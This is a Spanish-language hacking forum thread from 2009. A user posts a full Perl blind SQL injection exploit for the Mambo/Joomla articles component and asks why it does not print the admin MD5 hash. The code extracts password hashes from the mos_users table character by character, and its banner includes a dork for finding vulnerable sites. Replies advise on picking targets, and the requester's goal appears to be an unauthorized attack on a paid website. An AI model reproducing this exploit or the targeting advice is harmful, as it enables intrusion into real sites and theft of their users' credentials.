ayuda con exploit

04-oct-2009, 12:45

hola compañeros perdonen que los venga a molestar pero es que he compilado un exploit con el active perl pero cando lo ejecuto me deveria de tirar el hash-md5 pero no lo muestra sera que lo estoy ejecutando mal se los dejo aqui espero me puedan dar una luz saludos

Código:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
 print " \n";
 print " #######################################################################\n";
 print " #  Mambo Component Articles Blind SQL Injection Exploit #\n";
 print " #  Author:Ded MustD!e [
  


  
    
    
    [Solo usuarios registrados pueden 
    ver los links. 
    REGISTRARSE]

  

  
 #\n";
 print " # #\n";
 print " #  Dork :  inurl:option=articles artid #\n";
 print " #  Usage:  perl exploit.pl host path <options> #\n";
 print " #  Example: perl exploit.pl 
  


  
    
    
    [Solo usuarios registrados pueden 
    ver los links. 
    REGISTRARSE]

  

  
 /joomla/ -a 2 #\n";
 print " # #\n";
 print " #  Options: #\n";
 print " #   -a  valid Article id #\n";
 print " #######################################################################\n";
 exit;
}

my $host  = $ARGV[0];
my $path  = $ARGV[1];
my $userid = 1;
my $aid   = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
 $userid = $options{"u"};
}

if($options{"a"})
{
 $aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
 my $f = 0;
 my $h = 48;
 while(!$f && $h <= 57)
 {
  if(istrue2($host, $path, $userid, $aid, $i, $h))
  {
   $f = 1;
   syswrite(STDOUT, chr($h), 1);
  }
  $h++;
 }
 if(!$f)
 {
  $h = 97;
  while(!$f && $h <= 122)
  {
   if(istrue2($host, $path, $userid, $aid, $i, $h))
   {
    $f = 1;
    syswrite(STDOUT, chr($h), 1);
   }
   $h++;
  }
 }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
 my $host = shift;
 my $path = shift;
 my $uid  = shift;
 my $aid  = shift;
 my $i   = shift;
 my $h   = shift;

 my $ua = LWP::UserAgent->new;
 my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";

 if($options{"p"})
 {
  $ua->proxy('http', "http://".$options{"p"});
 }

 my $resp = $ua->get($query);
 my $content = $resp->content;
 my $regexp = "Back";

 if($content =~ /$regexp/)
 {
  return 1;
 }
 else
 {
  return 0;
 }

}

cuban-hack · 04-oct-2009, 13:32

se queda cargando..¿? y no te hace mas nada, pues entonces es probable que no sea vulnerable la victima.

si utilizaste alguna herramienta de escaneo como el sss, pues te digo que estas herramientas suelen dar falsos positivos en algunos servidores que algun dia tubieron ese fallo(algun dia, por que ya no lo tienen)

04-oct-2009, 13:42

mmm depronto creo men que es que no lo estoy utilizando mal tal vez no le estoy dando los valores coresondientes pues me pide la ruta completa y no puedo da con ella ya que es una web de pago y necesitaria entrar para confirmar si tiene una SQL injeccion pero tu meacabas de poner a dudar... :-\\

cuban-hack · 04-oct-2009, 14:03

en realidad no te esta pidiendo la ruta completa, te esta pidiendo si usa la web algun script prediseñado tipo jomla, o algo asi, sabiendo eso podrias hacer el ataque, pero tambien puede ser que no sea vulnerable..

Modificado: lo probare con un server local y ahora te digo

04-oct-2009, 14:10

hola men una pregunta como saber si la web tiene un script pre diseñado tipo lomla o mambo???

tendria que leer el code fuente??

saludos

cuban-hack · 04-oct-2009, 14:11

deves saber que es jomla o mambo (o porlomenos tener una idea basica de que funcion realizan esos script), una vez que sepas que es cada uno, sabras como saber si lo tiene, busca en google

04-oct-2009, 14:13

okas buscando despues edito saludos....

04-oct-2009, 13:32	#2
cuban-hack Gran Colaborador Fecha de Ingreso: diciembre-2006 Amigos 0 Mensajes: 1.097 Gracias: 0 Agradecido 1 vez en 1 mensaje.	Re: ayuda con exploit se queda cargando..¿? y no te hace mas nada, pues entonces es probable que no sea vulnerable la victima. si utilizaste alguna herramienta de escaneo como el sss, pues te digo que estas herramientas suelen dar falsos positivos en algunos servidores que algun dia tubieron ese fallo(algun dia, por que ya no lo tienen) __________________ A veces sentimos que lo que hacemos es tan solo una gota en el mar, pero el mar sería menos si le faltara una gota.<br />Alguno se estima atrevido, cuando con otros se compara. Algunos creo que hubo tan discretos que no acertaron a compararse sino a sí mismos.<br />Nuestras acciones hablan sobre nosotros tanto como nosotros sobre ellas.<br />

04-oct-2009, 13:42	#3
virus K Guest Amigos Mensajes: n/a	Re: ayuda con exploit mmm depronto creo men que es que no lo estoy utilizando mal tal vez no le estoy dando los valores coresondientes pues me pide la ruta completa y no puedo da con ella ya que es una web de pago y necesitaria entrar para confirmar si tiene una SQL injeccion pero tu meacabas de poner a dudar... :-\\

04-oct-2009, 14:03	#4
cuban-hack Gran Colaborador Fecha de Ingreso: diciembre-2006 Amigos 0 Mensajes: 1.097 Gracias: 0 Agradecido 1 vez en 1 mensaje.	Re: ayuda con exploit en realidad no te esta pidiendo la ruta completa, te esta pidiendo si usa la web algun script prediseñado tipo jomla, o algo asi, sabiendo eso podrias hacer el ataque, pero tambien puede ser que no sea vulnerable.. Modificado: lo probare con un server local y ahora te digo __________________ A veces sentimos que lo que hacemos es tan solo una gota en el mar, pero el mar sería menos si le faltara una gota.<br />Alguno se estima atrevido, cuando con otros se compara. Algunos creo que hubo tan discretos que no acertaron a compararse sino a sí mismos.<br />Nuestras acciones hablan sobre nosotros tanto como nosotros sobre ellas.<br />

04-oct-2009, 14:10	#5
virus K Guest Amigos Mensajes: n/a	Re: ayuda con exploit hola men una pregunta como saber si la web tiene un script pre diseñado tipo lomla o mambo??? tendria que leer el code fuente?? saludos

04-oct-2009, 14:11	#6
cuban-hack Gran Colaborador Fecha de Ingreso: diciembre-2006 Amigos 0 Mensajes: 1.097 Gracias: 0 Agradecido 1 vez en 1 mensaje.	Re: ayuda con exploit deves saber que es jomla o mambo (o porlomenos tener una idea basica de que funcion realizan esos script), una vez que sepas que es cada uno, sabras como saber si lo tiene, busca en google __________________ A veces sentimos que lo que hacemos es tan solo una gota en el mar, pero el mar sería menos si le faltara una gota.<br />Alguno se estima atrevido, cuando con otros se compara. Algunos creo que hubo tan discretos que no acertaron a compararse sino a sí mismos.<br />Nuestras acciones hablan sobre nosotros tanto como nosotros sobre ellas.<br />

04-oct-2009, 14:13	#7
virus K Guest Amigos Mensajes: n/a	Re: ayuda con exploit okas buscando despues edito saludos....

Herramientas
Mostrar Versión Imprimible Enviar por Correo
Desplegado
Mode Lineal Cambiar a Modo Hibrido Cambiar a Modo Hilado

Temas Similares
Tema	Autor	Foro	Respuestas	Último mensaje
Ayuda con Exploit	Doji	HacK GeneraL	27	31-jul-2009 18:15
ayuda con exploit	hack_boy	Bug y Exploits	6	27-mar-2008 17:04
ayuda con exploit	kilobay64	HacK GeneraL	2	03-may-2007 16:01
ayuda con exploit	kilobay64	Bug y Exploits	3	02-may-2007 14:17
ayuda exploit	djhunter	HacK GeneraL	3	27-ene-2007 09:49